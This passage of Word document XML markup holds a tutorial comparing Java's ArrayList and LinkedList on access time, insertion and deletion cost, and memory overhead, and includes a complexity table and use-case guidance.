          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: To access an element by index, it has to traverse the list from the beginning or end to the specified position, which takes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linear time).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF102F7" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69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lusion</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is more efficient for random access compared to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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280BA3C9" w14:textId="77777777" w:rsidR="0002149E"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2CFB2DF">
          <v:rect id="_x0000_i1468" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="619718A1" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149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3. Insertion and Deletion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C98C4AE" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBE5282" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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ons/Deletions at the End</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Efficient</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for appending elements at the end because it requires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time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6FEC1E" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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ons/Deletions in the Middle</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Less efficient. When inserting or deleting an element at any position other than the end,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time is required, because the elements after the inserted/deleted element need to be shifted to maintain the array's contiguous memory structure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C1F8CB" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63723892" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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ons/Deletions at the Beginning or Middle</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Efficient</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for inserting or deleting elements at the beginning or middle because it takes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time, provided you have a reference to the node. No elements need to be shifted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF1150D" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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ons/Deletions at the End</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if you have a reference to the last node. However, if you're inserting at the end and you need to traverse to the end of the list, it becomes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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC16FA9" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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lusion</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is more efficient for frequent insertions and deletions, especially when they occur at the beginning or middle of the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE57B5C" w14:textId="77777777" w:rsidR="0002149E"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50DEF26">
          <v:rect id="_x0000_i1469" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BA77E1" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149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Memory Usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6795A52A" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EE1F76" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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Efficient</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: It only stores the elements themselves. However, when the array needs to resize (when it reaches its capacity), a new array is created and elements are copied over. This resizing operation can occasionally lead to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>extra memory allocation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> during growth.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3439DE97" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1D0FEA" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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ess Memory Efficient</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Each element in a LinkedList requires </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>extra memory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the next and previous pointers, increasing memory overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F83B4F" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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lusion</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is more memory efficient than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especially for smaller collections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1207FB20" w14:textId="77777777" w:rsidR="0002149E"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29C725A">
          <v:rect id="_x0000_i1470" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5739C1A8" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149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Performance Under Different Scenario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40"/>
        <w:gridCol w:w="1551"/>
        <w:gridCol w:w="2120"/>
      </w:tblGrid>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="0DB37B3C" w14:textId="77777777" w:rsidTr="0002149E">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DC72B5D" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149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peration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CD766C0" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149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rrayList</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E8DB708" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149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LinkedList</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="77F77C02" w14:textId="77777777" w:rsidTr="0002149E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="398B71A8"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andom Access (get(i))</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35941119"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1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C60C879"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n)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="6292AD11" w14:textId="77777777" w:rsidTr="0002149E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C5D3F73"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dd at the end (add())</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5058202E"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amortized)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FD752DC"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1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="33B34436" w14:textId="77777777" w:rsidTr="0002149E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30065BA4"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Delete at the end</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7EF65CB8"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amortized)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C4FFD3F"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1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="65ED5499" w14:textId="77777777" w:rsidTr="0002149E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F4C9BC9"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Delete at the beginning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39017BDC"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n)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08F97AEC"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1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="5F48FAD4" w14:textId="77777777" w:rsidTr="0002149E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CD35982"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Delete in the middle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="331DA798"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n)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13B3441E"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if node is known)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="4D0EAECF" w14:textId="77777777" w:rsidTr="0002149E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0DCB7F3F"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Usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52DD3A66"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w</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C1642D5"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igher</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="47551556" w14:textId="77777777" w:rsidR="0002149E"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6DBAF9A">
          <v:rect id="_x0000_i1471" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="262071CA" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149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Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BA1B4A" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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hen to Use ArrayList</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB5B59C" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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you need </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fast random access</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4904DF56" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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the size of the collection doesn't change frequently, or changes mostly happen at the end.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF8D2E3" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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memory efficiency is a priority.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BF36D8" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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hen to Use LinkedList</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A7B0EB" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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you need to perform </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>frequent insertions and deletions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (especially in the middle or at the beginning).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3B06E7" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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re working with collections where elements are frequently added or removed from various positions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F84BC75" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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you need to efficiently manage a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>doubly linked list</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7600E1" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E"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700CA97A" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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is generally more efficient than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in terms of access time and memory usage, making it the better choice when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CEA32F" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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need </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fast random acces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low memory overhead</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02571147" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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collection size is fairly stable or only occasionally grows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613E840B" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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is more efficient when you need to perform </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>frequent insertions or deletions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, particularly at the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>beginning or middle</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the list. However, it has a higher memory overhead and slower random access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365C7D21" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E"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In summary, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>use ArrayList for most scenarios</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> where you mainly need random access, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>use LinkedList when you need efficient insertions and deletions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47566F46" w14:textId="23835319" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0002149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9B4ADFA">
          <v:rect id="_x0000_i1472" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="282C3A1C" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="0002149E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
